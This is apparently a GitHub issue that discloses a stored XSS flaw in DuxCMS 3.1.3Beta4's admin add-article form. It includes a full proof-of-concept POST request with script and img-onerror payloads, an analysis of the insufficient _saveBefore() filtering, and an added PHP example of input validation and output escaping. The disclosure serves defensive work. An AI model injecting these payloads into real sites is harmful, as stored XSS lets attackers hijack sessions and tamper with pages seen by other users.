There is a stored XSS vulnerability when adding articles in the DuxCMS 3.1.3Beta4 backend. #6

Open
czheisenberg opened this issue Jun 11, 2024 · 0 comments

Comments

@czheisenberg

Project address: https://github.com/duxphp/DuxCMS3/
Prerequisite: log in to the backend (admin panel).

Vulnerability URL:
http://127.0.0.1:8093/s/article/Content/add?
[screenshot]

POC:

```http
POST http://127.0.0.1:8093/s/article/Content/add? HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 328
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/s/article/Content/add?
Cookie: PHPSESSID=af75la6jq4hp11pn3gv4ttj15o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=1

class_id=1&title=<script>alert('title')</script>&sub_title=2&image="><img%20src=x%20onerror=alert('img')>&auth=%3Cscript%3Ealert('auth')%3C%2Fscript%3E&sort=2&virtual_view=3&content=<script>alert('content')</script>&keyword=<script>alert('keyword')</script>&description=<script>alert('description')</script>&status=1&article_id=
```

Tested: title, image, auth, content and description do not validate the input. The values are inserted directly into the database, which results in a stored XSS vulnerability. auth is not displayed on the page, so it is not triggered.
Visit the home page:
http://127.0.0.1:8093/ (your IP and port)
[screenshots]

Click on the article.
[screenshots]

All of the above parameters are triggered.

Vulnerable code:

app/article/model/ArticleModel.php

Lines 64-99.

[screenshot]

From its name, `_saveBefore()` can be inferred to do some processing before saving.

But this part of the code only checks whether the content and description parameters exist.
The other parameters do not appear in this part of the code, so they cannot be validated.

Only keyword receives special treatment (`htmlClear()`).

So we can insert a malicious XSS payload.

Take a look at what is saved in the database.
[screenshot]
Title, description, image and auth are saved as-is. content does go through an escape operation, but it is still triggered on the page shown above.
Only in the keyword parameter is `<script>` filtered out.

[screenshots]
When the foreach on line 75 is executed, `<script>` and `</script>` are removed.
[screenshot]

From the return value, you can see that keyword is processed.
That is to say, the `_saveBefore()` function does some processing before saving, but only for keyword and not for the other parameters.
So the other parameters accept malicious code, which leads to this vulnerability.
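Added example (written for this page; not code from DuxCMS3 or from the reporter), in PHP: it reconstructs the keyword-only filtering described in the issue as a stand-in, places beside it a save hook that validates every field present in the PoC request and a renderer that escapes on output, and runs both against a copy of the PoC body. The field names come from the PoC; the function names, the accepted pattern for `image`, and the constructed request copy are assumptions.

```php
<?php
// Added example (not DuxCMS3 code): contrasts the keyword-only filtering the
// issue describes with a save hook that handles every user-controlled field,
// plus output-side escaping, run against a copy of the issue's PoC body.
// Field names come from the PoC; helper names and the image pattern are assumptions.
declare(strict_types=1);

// Fields that are plain text: markup is never legitimate here.
const PLAIN_TEXT_FIELDS = ['title', 'sub_title', 'auth', 'keyword', 'description'];

// Reconstruction of the behaviour reported in the issue (not the project's
// code): only keyword is touched, and only <script> / </script> are removed.
function saveBeforeAsReported(array $data): array
{
    if (isset($data['keyword'])) {
        $data['keyword'] = str_ireplace(['<script>', '</script>'], '', (string) $data['keyword']);
    }
    return $data;
}

// Hardened save hook: validate every field on input instead of trusting it.
// Throws on input that cannot be legitimate, so nothing hostile is stored.
function saveBeforeHardened(array $data): array
{
    foreach (PLAIN_TEXT_FIELDS as $field) {
        if (!isset($data[$field])) {
            continue;
        }
        $value = trim((string) $data[$field]);
        // Plain-text fields must not carry markup at all; reject rather than
        // try to "clean" the value, which is what the keyword filter attempts.
        if ($value !== strip_tags($value)) {
            throw new InvalidArgumentException("$field must not contain HTML");
        }
        $data[$field] = $value;
    }
    if (isset($data['image'])) {
        // image ends up inside src="...": accept only a conservative relative
        // path (assumed policy) so the value can never close the attribute.
        if (!preg_match('#^[A-Za-z0-9_./-]+$#', (string) $data['image'])) {
            throw new InvalidArgumentException('image must be a plain relative path');
        }
    }
    foreach (['class_id', 'sort', 'virtual_view', 'status'] as $field) {
        if (isset($data[$field]) && !ctype_digit((string) $data[$field])) {
            throw new InvalidArgumentException("$field must be an integer");
        }
    }
    // content is rich text: escaping it on save does not help once the page
    // renders it as HTML again (the issue reports content still firing). It
    // needs an allowlist HTML sanitizer at render time, outside this example.
    return $data;
}

// Output-side escaping: the layer that must exist regardless of what was stored.
function escText(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderArticleHeader(array $a): string
{
    // Every dynamic value is escaped for its context (text node or attribute value).
    return '<h1>' . escText($a['title']) . '</h1>'
         . '<img src="' . escText($a['image']) . '" alt="">'
         . '<p class="auth">' . escText($a['auth']) . '</p>';
}

// Constructed copy of the PoC request body; parse_str percent-decodes it.
$pocBody = "class_id=1&title=<script>alert('title')</script>&sub_title=2"
    . "&image=\"><img%20src=x%20onerror=alert('img')>"
    . "&auth=%3Cscript%3Ealert('auth')%3C%2Fscript%3E&sort=2&virtual_view=3"
    . "&content=<script>alert('content')</script>&keyword=<script>alert('keyword')</script>"
    . "&description=<script>alert('description')</script>&status=1&article_id=";
parse_str($pocBody, $input);

$asReported = saveBeforeAsReported($input);
echo "as reported, title stored as: {$asReported['title']}\n";
echo "as reported, keyword stored as: {$asReported['keyword']}\n";

try {
    saveBeforeHardened($input);
    echo "hardened hook accepted the request\n";
} catch (InvalidArgumentException $e) {
    echo "hardened hook rejected the request: {$e->getMessage()}\n";
}

// Even if such a row had been stored, context-aware output escaping keeps it inert.
echo renderArticleHeader($asReported) . "\n";
```

Run it with `php example.php`. The first two lines show the payload surviving in title while only the `<script>` wrapper is stripped from keyword; the hardened hook rejects the request at the first plain-text field carrying markup; the rendered header shows the same stored values neutralised by escaping at output, which is the control that holds even when an input filter is incomplete.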
